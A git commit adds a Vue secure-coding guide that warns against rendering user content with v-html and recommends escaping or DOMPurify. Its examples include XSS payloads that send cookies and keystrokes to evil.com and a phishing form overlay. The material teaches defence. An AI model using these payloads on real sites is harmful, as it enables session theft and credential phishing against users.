feat: Complete fleet — 94 skills across 10+ domains
Pulled ALL skills from 15 source repositories: - anthropics/skills: 16 (docs, design, MCP, testing) - obra/superpowers: 14 (TDD, debugging, agents, planning) - coreyhaines31/marketingskills: 25 (marketing, CRO, SEO, growth) - better-auth/skills: 5 (auth patterns) - vercel-labs/agent-skills: 5 (React, design, Vercel) - antfu/skills: 16 (Vue, Vite, Vitest, pnpm, Turborepo) - Plus 13 individual skills from various repos Mosaic Stack is not limited to coding — the Orchestrator and subagents serve coding, business, design, marketing, writing, logistics, analysis, and more. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
This commit is contained in:
Jason Woltje
111
skills/vue-best-practices/reference/v-html-xss-security.md
Normal file
111
skills/vue-best-practices/reference/v-html-xss-security.md
Normal file
@@ -0,0 +1,111 @@
|
||||
---
|
||||
title: Never Use v-html with User-Provided Content
|
||||
impact: HIGH
|
||||
impactDescription: Using v-html with untrusted content leads to XSS vulnerabilities
|
||||
type: capability
|
||||
tags: [vue3, security, xss, v-html, template]
|
||||
---
|
||||
|
||||
# Never Use v-html with User-Provided Content
|
||||
|
||||
**Impact: HIGH** - Dynamically rendering arbitrary HTML with `v-html` can lead to Cross-Site Scripting (XSS) vulnerabilities. Attackers can inject malicious scripts that execute in users' browsers, stealing credentials or performing actions on their behalf.
|
||||
|
||||
The `v-html` directive renders raw HTML without sanitization. While useful for trusted content, it bypasses Vue's automatic text escaping and should never be used with user input.
|
||||
|
||||
## Task Checklist
|
||||
|
||||
- [ ] Never use `v-html` with user-provided content
|
||||
- [ ] Prefer text interpolation `{{ }}` which automatically escapes HTML
|
||||
- [ ] Use components for template composition instead of `v-html`
|
||||
- [ ] If raw HTML is absolutely needed, sanitize it with a library like DOMPurify
|
||||
- [ ] Audit existing `v-html` usage for potential XSS vectors
|
||||
|
||||
**Incorrect:**
|
||||
```vue
|
||||
<template>
|
||||
<!-- DANGEROUS: User input rendered as HTML -->
|
||||
<div v-html="userComment"></div>
|
||||
|
||||
<!-- DANGEROUS: Content from API without sanitization -->
|
||||
<article v-html="articleContent"></article>
|
||||
|
||||
<!-- DANGEROUS: URL parameters or form inputs -->
|
||||
<p v-html="searchQuery"></p>
|
||||
</template>
|
||||
|
||||
<script setup>
|
||||
import { ref } from 'vue'
|
||||
|
||||
// This could contain: <script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
|
||||
const userComment = ref(props.comment)
|
||||
</script>
|
||||
```
|
||||
|
||||
**Correct:**
|
||||
```vue
|
||||
<template>
|
||||
<!-- SAFE: Text interpolation escapes HTML -->
|
||||
<div>{{ userComment }}</div>
|
||||
|
||||
<!-- SAFE: Use components for rich content -->
|
||||
<CommentRenderer :content="userComment" />
|
||||
|
||||
<!-- SAFE: Only use v-html with trusted, sanitized content -->
|
||||
<div v-html="sanitizedContent"></div>
|
||||
</template>
|
||||
|
||||
<script setup>
|
||||
import { computed } from 'vue'
|
||||
import DOMPurify from 'dompurify'
|
||||
|
||||
const props = defineProps(['comment', 'trustedHtml'])
|
||||
|
||||
// Option 1: Use text interpolation (recommended)
|
||||
const userComment = computed(() => props.comment)
|
||||
|
||||
// Option 2: Sanitize if raw HTML is truly needed
|
||||
const sanitizedContent = computed(() =>
|
||||
DOMPurify.sanitize(props.trustedHtml)
|
||||
)
|
||||
</script>
|
||||
```
|
||||
|
||||
## When v-html Is Acceptable
|
||||
|
||||
```vue
|
||||
<template>
|
||||
<!-- OK: Static HTML from your own codebase -->
|
||||
<div v-html="staticLegalDisclaimer"></div>
|
||||
|
||||
<!-- OK: Content from trusted CMS with sanitization -->
|
||||
<article v-html="sanitizedCmsContent"></article>
|
||||
</template>
|
||||
|
||||
<script setup>
|
||||
// Content you control, not user input
|
||||
const staticLegalDisclaimer = `
|
||||
<p>Terms and conditions apply.</p>
|
||||
<a href="/legal">Read more</a>
|
||||
`
|
||||
</script>
|
||||
```
|
||||
|
||||
## XSS Attack Examples
|
||||
|
||||
Attackers can inject various payloads:
|
||||
```html
|
||||
<!-- Cookie theft -->
|
||||
<img src="x" onerror="fetch('https://evil.com?c='+document.cookie)">
|
||||
|
||||
<!-- Keylogging -->
|
||||
<script>document.onkeypress=function(e){fetch('https://evil.com?k='+e.key)}</script>
|
||||
|
||||
<!-- Phishing overlay -->
|
||||
<div style="position:fixed;top:0;left:0;width:100%;height:100%">
|
||||
<form action="https://evil.com/steal">Login required...</form>
|
||||
</div>
|
||||
```
|
||||
|
||||
## Reference
|
||||
- [Vue.js Template Syntax - Raw HTML](https://vuejs.org/guide/essentials/template-syntax.html#raw-html)
|
||||
- [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
|
||||
Reference in New Issue
Block a user